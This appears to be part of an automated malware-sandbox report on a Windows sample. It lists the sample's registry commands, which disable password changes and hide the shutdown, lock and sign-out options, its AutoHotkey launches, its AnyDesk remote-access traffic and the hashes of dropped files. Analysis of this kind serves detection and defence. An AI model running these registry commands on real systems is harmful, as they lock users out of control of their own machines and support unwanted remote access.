REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| DE | 49.12.130.236:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-d4aa0625.net.anydesk.com | udp |
| GB | 57.128.141.164:443 | relay-d4aa0625.net.anydesk.com | tcp |
| DE | 49.12.130.236:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 57.128.141.163:443 | relay-ad195ac5.net.anydesk.com | tcp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| BE | 64.233.167.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:20001 | udp | |
| N/A | 239.255.102.18:10810 | udp | |
| N/A | 239.255.102.18:25830 | udp | |
| N/A | 239.255.102.18:26112 | udp | |
| N/A | 239.255.102.18:25149 | udp | |
| N/A | 239.255.102.18:62977 | udp | |
| N/A | 239.255.102.18:36142 | udp | |
| N/A | 239.255.102.18:55586 | udp | |
| N/A | 239.255.102.18:44143 | udp | |
| N/A | 239.255.102.18:10296 | udp | |
| N/A | 239.255.102.18:56456 | udp | |
| N/A | 239.255.102.18:52980 | udp | |
| N/A | 239.255.102.18:21155 | udp | |
| N/A | 239.255.102.18:61452 | udp | |
| N/A | 239.255.102.18:21298 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:45624 | udp | |
| N/A | 239.255.102.18:38395 | udp | |
| N/A | 239.255.102.18:62185 | udp | |
| N/A | 239.255.102.18:56688 | udp | |
| N/A | 239.255.102.18:45492 | udp | |
| N/A | 239.255.102.18:486 | udp | |
| N/A | 239.255.102.18:51771 | udp | |
| N/A | 239.255.102.18:46409 | udp | |
| N/A | 239.255.102.18:59788 | udp | |
| N/A | 239.255.102.18:48667 | udp | |
| N/A | 239.255.102.18:55503 | udp | |
| N/A | 239.255.102.18:41705 | udp | |
| N/A | 239.255.102.18:44565 | udp | |
| N/A | 239.255.102.18:64446 | udp | |
| N/A | 239.255.102.18:38749 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:19369 | udp | |
| N/A | 239.255.102.18:43099 | udp | |
| N/A | 239.255.102.18:11206 | udp | |
| N/A | 239.255.102.18:60064 | udp | |
| N/A | 239.255.102.18:55852 | udp | |
| N/A | 239.255.102.18:57187 | udp | |
| N/A | 239.255.102.18:51265 | udp | |
| N/A | 239.255.102.18:4552 | udp | |
| N/A | 239.255.102.18:8778 | udp | |
| N/A | 239.255.102.18:47290 | udp | |
| US | 104.244.42.1:443 | twitter.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:28266 | udp | |
| N/A | 239.255.102.18:38384 | udp | |
| N/A | 239.255.102.18:11763 | udp | |
| N/A | 239.255.102.18:24580 | udp | |
| N/A | 239.255.102.18:319 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:853 | udp | |
| N/A | 239.255.102.18:22296 | udp | |
| N/A | 239.255.102.18:50605 | udp | |
| N/A | 239.255.102.18:59456 | udp | |
| N/A | 239.255.102.18:58819 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:25558 | udp | |
| N/A | 239.255.102.18:39581 | udp | |
| N/A | 239.255.102.18:60413 | udp | |
| N/A | 239.255.102.18:40569 | udp | |
| N/A | 239.255.102.18:53658 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:61947 | udp | |
| N/A | 239.255.102.18:42999 | udp | |
| N/A | 239.255.102.18:33490 | udp | |
| N/A | 239.255.102.18:21645 | udp | |
| N/A | 239.255.102.18:56528 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:44802 | udp | |
| N/A | 239.255.102.18:13547 | udp | |
| N/A | 239.255.102.18:37376 | udp | |
| N/A | 239.255.102.18:48472 | udp | |
| N/A | 239.255.102.18:36225 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:27047 | udp | |
| N/A | 239.255.102.18:62609 | udp | |
| N/A | 239.255.102.18:59297 | udp | |
| N/A | 239.255.102.18:60884 | udp | |
| N/A | 239.255.102.18:62567 | udp | |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| GB | 18.245.187.82:80 | api.playanext.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 104.19.130.98:443 | spankbang.com | tcp |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:24510 | udp | |
| N/A | 239.255.102.18:64599 | udp | |
| N/A | 239.255.102.18:15520 | udp | |
| N/A | 239.255.102.18:2184 | udp | |
| N/A | 239.255.102.18:5587 | udp | |
| N/A | 239.255.102.18:49850 | udp | |
| N/A | 239.255.102.18:7749 | udp | |
| N/A | 239.255.102.18:25564 | udp | |
| N/A | 239.255.102.18:38870 | udp | |
| N/A | 239.255.102.18:13918 | udp | |
| N/A | 239.255.102.18:3447 | udp | |
| N/A | 239.255.102.18:36276 | udp | |
| N/A | 239.255.102.18:40100 | udp | |
| N/A | 239.255.102.18:19410 | udp | |
| N/A | 239.255.102.18:9735 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:1279 | udp | |
| N/A | 239.255.102.18:64354 | udp | |
| N/A | 239.255.102.18:38725 | udp | |
| N/A | 239.255.102.18:6665 | udp | |
| N/A | 239.255.102.18:8207 | udp | |
| N/A | 239.255.102.18:51741 | udp | |
| N/A | 239.255.102.18:21497 | udp | |
| N/A | 239.255.102.18:27055 | udp | |
| N/A | 239.255.102.18:49700 | udp | |
| N/A | 239.255.102.18:14762 | udp | |
| N/A | 239.255.102.18:34392 | udp | |
| N/A | 239.255.102.18:61015 | udp | |
| N/A | 239.255.102.18:64695 | udp | |
| N/A | 239.255.102.18:63830 | udp | |
| N/A | 239.255.102.18:51588 | udp | |
| N/A | 239.255.102.18:55614 | udp | |
| N/A | 239.255.102.18:44671 | udp | |
| N/A | 239.255.102.18:65330 | udp | |
| N/A | 239.255.102.18:7621 | udp | |
| N/A | 239.255.102.18:26820 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:9250 | udp | |
| N/A | 239.255.102.18:12279 | udp | |
| N/A | 239.255.102.18:32267 | udp | |
| N/A | 239.255.102.18:12002 | udp | |
| N/A | 239.255.102.18:20437 | udp | |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 2.18.190.81:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | flagb93361.spankbang.com | udp |
| US | 104.19.131.98:443 | flagb93361.spankbang.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | tcp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:24615 | udp | |
| N/A | 239.255.102.18:21521 | udp | |
| N/A | 239.255.102.18:1628 | udp | |
| N/A | 239.255.102.18:13515 | udp | |
| N/A | 239.255.102.18:63931 | udp | |
| N/A | 239.255.102.18:64497 | udp | |
| N/A | 239.255.102.18:10876 | udp | |
| N/A | 239.255.102.18:13005 | udp | |
| N/A | 239.255.102.18:8546 | udp | |
| N/A | 239.255.102.18:63082 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:36176 | udp | |
| N/A | 239.255.102.18:64864 | udp | |
| N/A | 239.255.102.18:45802 | udp | |
| N/A | 239.255.102.18:9958 | udp | |
| N/A | 239.255.102.18:29095 | udp | |
| N/A | 239.255.102.18:62585 | udp | |
| N/A | 239.255.102.18:20894 | udp | |
| N/A | 239.255.102.18:49123 | udp | |
| N/A | 239.255.102.18:47244 | udp | |
| N/A | 239.255.102.18:36151 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:42587 | udp | |
| N/A | 239.255.102.18:43311 | udp | |
| N/A | 239.255.102.18:1596 | udp | |
| N/A | 239.255.102.18:59489 | udp | |
| N/A | 239.255.102.18:16460 | udp | |
| N/A | 239.255.102.18:8860 | udp | |
| N/A | 239.255.102.18:43866 | udp | |
| N/A | 239.255.102.18:2015 | udp | |
| N/A | 239.255.102.18:17514 | udp | |
| N/A | 239.255.102.18:37388 | udp | |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 172.64.147.206:443 | go.xlviirdr.com | tcp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 172.64.147.206:443 | go.xlviirdr.com | tcp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 104.17.11.106:443 | img.strpst.com | tcp |
| US | 104.17.11.106:443 | img.strpst.com | tcp |
| US | 8.8.8.8:53 | go.xxxviiijmp.com | udp |
| US | 104.18.40.50:443 | go.xxxviiijmp.com | tcp |
| US | 104.18.40.50:443 | go.xxxviiijmp.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:23767 | udp | |
| N/A | 239.255.102.18:27910 | udp | |
| N/A | 239.255.102.18:30462 | udp | |
| N/A | 239.255.102.18:27440 | udp | |
| N/A | 239.255.102.18:58578 | udp | |
| N/A | 239.255.102.18:19282 | udp | |
| N/A | 239.255.102.18:33753 | udp | |
| N/A | 239.255.102.18:43732 | udp | |
| N/A | 239.255.102.18:24016 | udp | |
| N/A | 239.255.102.18:18719 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:3880 | udp | |
| N/A | 239.255.102.18:46706 | udp | |
| N/A | 239.255.102.18:14899 | udp | |
| N/A | 239.255.102.18:24722 | udp | |
| N/A | 239.255.102.18:49528 | udp | |
| N/A | 239.255.102.18:34678 | udp | |
| N/A | 239.255.102.18:63517 | udp | |
| N/A | 239.255.102.18:41669 | udp | |
| N/A | 239.255.102.18:65345 | udp | |
| N/A | 239.255.102.18:43672 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:23005 | udp | |
| N/A | 239.255.102.18:41228 | udp | |
| N/A | 239.255.102.18:52111 | udp | |
| N/A | 239.255.102.18:23710 | udp | |
| N/A | 239.255.102.18:46702 | udp | |
| N/A | 239.255.102.18:37332 | udp | |
| N/A | 239.255.102.18:15142 | udp | |
| N/A | 239.255.102.18:28504 | udp | |
| N/A | 239.255.102.18:54227 | udp | |
| N/A | 239.255.102.18:44942 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:49318 | udp | |
| N/A | 239.255.102.18:17726 | udp | |
| N/A | 239.255.102.18:22026 | udp | |
| N/A | 239.255.102.18:10297 | udp | |
| N/A | 239.255.102.18:33010 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:48621 | udp | |
| N/A | 239.255.102.18:5605 | udp | |
| N/A | 239.255.102.18:16072 | udp | |
| N/A | 239.255.102.18:53531 | udp | |
| N/A | 239.255.102.18:27204 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:20684 | udp | |
| N/A | 239.255.102.18:400 | udp | |
| N/A | 239.255.102.18:53587 | udp | |
| N/A | 239.255.102.18:9340 | udp | |
| N/A | 239.255.102.18:34368 | udp | |
| N/A | 239.255.102.18:9338 | udp | |
| N/A | 239.255.102.18:40979 | udp | |
| N/A | 239.255.102.18:59778 | udp | |
| N/A | 239.255.102.18:22646 | udp | |
| N/A | 239.255.102.18:21096 | udp | |
| N/A | 239.255.102.18:21672 | udp | |
| N/A | 239.255.102.18:16311 | udp | |
| N/A | 239.255.102.18:15476 | udp | |
| N/A | 239.255.102.18:59530 | udp | |
| N/A | 239.255.102.18:33540 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:1614 | udp | |
| N/A | 239.255.102.18:34897 | udp | |
| N/A | 239.255.102.18:29230 | udp | |
| N/A | 239.255.102.18:57242 | udp | |
| N/A | 239.255.102.18:21804 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:48971 | udp | |
| N/A | 239.255.102.18:49475 | udp | |
| N/A | 239.255.102.18:27340 | udp | |
| N/A | 239.255.102.18:16193 | udp | |
| N/A | 239.255.102.18:27804 | udp | |
| N/A | 239.255.102.18:12503 | udp | |
| N/A | 239.255.102.18:24085 | udp | |
| N/A | 239.255.102.18:34632 | udp | |
| N/A | 239.255.102.18:50398 | udp | |
| N/A | 239.255.102.18:31606 | udp | |
| N/A | 239.255.102.18:27611 | udp | |
| N/A | 239.255.102.18:64958 | udp | |
| N/A | 239.255.102.18:18628 | udp | |
| N/A | 239.255.102.18:17643 | udp | |
| N/A | 239.255.102.18:59884 | udp | |
| N/A | 239.255.102.18:32326 | udp | |
| N/A | 239.255.102.18:19006 | udp | |
| N/A | 239.255.102.18:40293 | udp | |
| N/A | 239.255.102.18:56018 | udp | |
| N/A | 239.255.102.18:10154 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:64144 | udp | |
| N/A | 239.255.102.18:10804 | udp | |
| N/A | 239.255.102.18:50882 | udp | |
| N/A | 239.255.102.18:61897 | udp | |
| N/A | 239.255.102.18:38690 | udp | |
| N/A | 239.255.102.18:49171 | udp | |
| N/A | 239.255.102.18:58160 | udp | |
| N/A | 239.255.102.18:28342 | udp | |
| N/A | 239.255.102.18:15329 | udp | |
| N/A | 239.255.102.18:58295 | udp | |
| N/A | 239.255.102.18:6982 | udp | |
| N/A | 239.255.102.18:23476 | udp | |
| N/A | 239.255.102.18:37755 | udp | |
| N/A | 239.255.102.18:38980 | udp | |
| N/A | 239.255.102.18:10135 | udp | |
| N/A | 239.255.102.18:29860 | udp | |
| N/A | 239.255.102.18:445 | udp | |
| N/A | 239.255.102.18:40119 | udp | |
| N/A | 239.255.102.18:12089 | udp | |
| N/A | 239.255.102.18:15898 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:38993 | udp | |
| N/A | 239.255.102.18:26014 | udp | |
| N/A | 239.255.102.18:26352 | udp | |
| N/A | 239.255.102.18:64609 | udp | |
| N/A | 239.255.102.18:22818 | udp | |
| N/A | 239.255.102.18:5009 | udp | |
| N/A | 239.255.102.18:10497 | udp | |
| N/A | 239.255.102.18:31142 | udp | |
| N/A | 239.255.102.18:56231 | udp | |
| N/A | 239.255.102.18:20173 | udp | |
| N/A | 239.255.102.18:53569 | udp | |
| N/A | 239.255.102.18:49187 | udp | |
| N/A | 239.255.102.18:31221 | udp | |
| N/A | 239.255.102.18:977 | udp | |
| N/A | 239.255.102.18:45810 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:45810 | udp | |
| N/A | 239.255.102.18:59339 | udp | |
| N/A | 239.255.102.18:12052 | udp | |
| N/A | 239.255.102.18:3940 | udp | |
| N/A | 239.255.102.18:16498 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:44734 | udp | |
| N/A | 239.255.102.18:54375 | udp | |
| N/A | 239.255.102.18:13591 | udp | |
| N/A | 239.255.102.18:49141 | udp | |
| N/A | 239.255.102.18:57599 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:57389 | udp | |
| N/A | 239.255.102.18:53076 | udp | |
| N/A | 239.255.102.18:26191 | udp | |
| N/A | 239.255.102.18:14215 | udp | |
| N/A | 239.255.102.18:9652 | udp | |
| N/A | 239.255.102.18:14482 | udp | |
| N/A | 239.255.102.18:55881 | udp | |
| N/A | 239.255.102.18:29977 | udp | |
| N/A | 239.255.102.18:51315 | udp | |
| N/A | 239.255.102.18:33111 | udp | |
| N/A | 239.255.102.18:43405 | udp | |
| N/A | 239.255.102.18:24106 | udp | |
| N/A | 239.255.102.18:30216 | udp | |
| N/A | 239.255.102.18:21982 | udp | |
| N/A | 239.255.102.18:41917 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:49101 | udp | |
| N/A | 239.255.102.18:63288 | udp | |
| N/A | 239.255.102.18:10201 | udp | |
| N/A | 239.255.102.18:57603 | udp | |
| N/A | 239.255.102.18:45963 | udp | |
| N/A | 239.255.102.18:7281 | udp | |
| N/A | 239.255.102.18:25487 | udp | |
| N/A | 239.255.102.18:12530 | udp | |
| N/A | 239.255.102.18:52326 | udp | |
| N/A | 239.255.102.18:23033 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:43015 | udp | |
| N/A | 239.255.102.18:6538 | udp | |
| N/A | 239.255.102.18:24990 | udp | |
| N/A | 239.255.102.18:26541 | udp | |
| N/A | 239.255.102.18:27845 | udp | |
| N/A | 239.255.102.18:46687 | udp | |
| N/A | 239.255.102.18:21983 | udp | |
| N/A | 239.255.102.18:40618 | udp | |
| N/A | 239.255.102.18:3831 | udp | |
| N/A | 239.255.102.18:8743 | udp | |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\20E9.tmp\20EA.tmp\20EB.vbs
| MD5 | 3c37e86d3572f4f291e0bf5c9ab78e41 |
| SHA1 | 4a2617dbbba0fc65275bbacf6738d604cbfd4eae |
| SHA256 | 426f46f8c62e39fffe4e2763cf87d3b5de568b0a0179737028db0e2ed43d0e16 |
| SHA512 | 5e827131ef024f358d3fc952f8b489003568b948d0a5a24556db1aeb8b00b21a04d1f6483652bf830a5050ccc3d734b27bf385129007305a93d16d844e84303c |
C:\Users\Admin\AppData\Roaming\doorbell-sys.exe
| MD5 | 583050ddb118acb68beb4e210b243c53 |
| SHA1 | da7a9d361cb60ebe9e767710585cfeb4d0f84444 |
| SHA256 | 10c2c130f92a90332bf66f137978ff49d88397b71f0e31a9fccbfeabc1968245 |
| SHA512 | de869a3ee8d793a42a432c12b3cc6c0a4fbd60e4713c2f5199c576841c0d6640f66f9b2ba88af97f6b5dce5498cb5387687924941f1f24db8136a8bbe4cfece5 |
C:\Users\Admin\AppData\Local\Temp\21D3.tmp\21D4.tmp\21D5.bat
| MD5 | c9dc4166ceb77ae5e86ea472b989b34c |
| SHA1 | 340ee384d950b11977799791854c793e7347b091 |
| SHA256 | 223338d4ba378aa7d08dec85f046a0c56accb9fb02dd01a9876c69a428fc0594 |
| SHA512 | 8533e83302ddc866d2e41e7adcc000083537d5975668bc9ac5266dfe43f89cf384d10eeecabeb940fc69f02d80ae5a8efd5c29ff084b3ca90b4bb7e13c95c7fe |
C:\Users\Admin\Downloads\AnyDesk.exe
| MD5 | aee6801792d67607f228be8cec8291f9 |
| SHA1 | bf6ba727ff14ca2fddf619f292d56db9d9088066 |
| SHA256 | 1cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499 |
| SHA512 | 09d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f |
memory/3012-31-0x0000000001090000-0x00000000027D9000-memory.dmp
memory/2792-38-0x0000000001090000-0x00000000027D9000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | 4a56c6a2d4899e7b25a4fa79d1bc94a4 |
| SHA1 | 1396ac182235801ab0d121822bb96b3414c34895 |
| SHA256 | f5acb4134c1024590be411b9cd57d794ef9e38dff3a98948c36bf915c27dbc4f |
| SHA512 | aa2a770ede3508fcf05b8006f70a3696f64e1b2ee9d940b62977132a547cc0051329359dfdfbb660746bed31727eacc361007002dece3c37bdb01d966b9dcb0f |
memory/2984-48-0x0000000001090000-0x00000000027D9000-memory.dmp
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
| MD5 | a787c308bd30d6d844e711d7579be552 |
| SHA1 | 473520be4ea56333d11a7a3ff339ddcadfe77791 |
| SHA256 | 8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440 |
| SHA512 | da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973 |
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
| MD5 | f4fb409ecde15202fdeb9b1a17b2dade |
| SHA1 | 81dafc4ec53e826978235c117f28b498dcfc43e2 |
| SHA256 | 43dff269482a34b78ae3de0ee866b94c704bd19ed79294009c4df63324b57c2d |
| SHA512 | 4531f03626ed4d3fe772b1a04eb59b013b7bfdda675a93aed44e7a3a1076ade6b387c0286bba6516ae234fc3e2d2d501c87745a9df1d11038886bcdec1f8c7f2 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 744b34b58fb1219ccb2e6ab8bed9fdb4 |
| SHA1 | 86acfeb4512c1fe52de5f35c4c9f5910115a042e |
| SHA256 | daec21fbf622b98fec4da3ed08a6fed59babc2d65248303b089430e63dcee428 |
| SHA512 | 8c03dc310ac54b597c718e6e151d08cd2bf791006b4142b821c7d4927a276b477bc36916293f28907b4286d0cbb25b6b8a0de3978e7bb71002b5c77307c8422a |
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
| MD5 | 5b4c9f2b9e5f7fd381cd1274567abd96 |
| SHA1 | 809dad4e98bd23109358d9a76745ac6674a70a99 |
| SHA256 | 4066f069c73b2c862e0ff4b13bcdda69e8be652b8a68c32e8d4c8afa10d3423a |
| SHA512 | f9e3144418964b36f33c41e2143938bdac1bdad061df794a97e5fc754f217d10fd26339f448ea17c7d253cca70fcf92f7ca7410082c2f9e22edea4cd339b9d14 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 52e12ab9343da2ecd309936c1bc875fc |
| SHA1 | 8af5668f51779d5fa2b1ca0a3d56dcfed0925b9f |
| SHA256 | dfa7dfd141c1cd2b799f066af5fad58a3bbb0d3c2ef5cb40003d41c601da6859 |
| SHA512 | 32276cbadf58ecca7f2fb30fd98656b7fc803a4260f4a17259764a5ddae7fc966d5be8a15df57d5a65b77fc23334e80984e1a3a94a89d1d4070289f962f6569b |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | 0301a4c01baff81872539c058d24d2ac |
| SHA1 | 3c4f0590dd9c729992499341030e0a4fd8c87255 |
| SHA256 | b223e2079cb83d01184e2c7488e591e5c340a80fdc3a1b3acedb7b6fde124762 |
| SHA512 | 6f31c08254cc1cc40e8b987501e47800d1d039cd2caa37640519980f4b41b0f6051897ce15c06ab7299d2f08c850bf71fe9102d3604444fe701c3a9c7a162ea2 |
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2792-153-0x0000000001090000-0x00000000027D9000-memory.dmp
memory/2984-154-0x0000000001090000-0x00000000027D9000-memory.dmp
memory/1476-161-0x0000000000250000-0x0000000001999000-memory.dmp
C:\ProgramData\AnyDesk\system.conf
| MD5 | afdc4f69f4720b8c4153f6186f49a2b6 |
| SHA1 | 329c27ea36d7913809b0c239bb58e91d2ee468ac |
| SHA256 | 9a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571 |
| SHA512 | 3a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de |
